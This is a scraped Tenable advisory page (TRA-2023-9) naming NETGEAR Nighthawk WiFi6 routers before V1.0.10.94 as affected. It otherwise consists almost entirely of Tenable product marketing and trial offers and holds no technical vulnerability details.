_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2023-9

Affected Products

NETGEAR Nighthawk WiFi6 Router prior to V1.0.10.94

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today.

**NEW - Nessus Expert Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Professional Trial.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now. To learn more about the trial process click here.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Tag

#wifi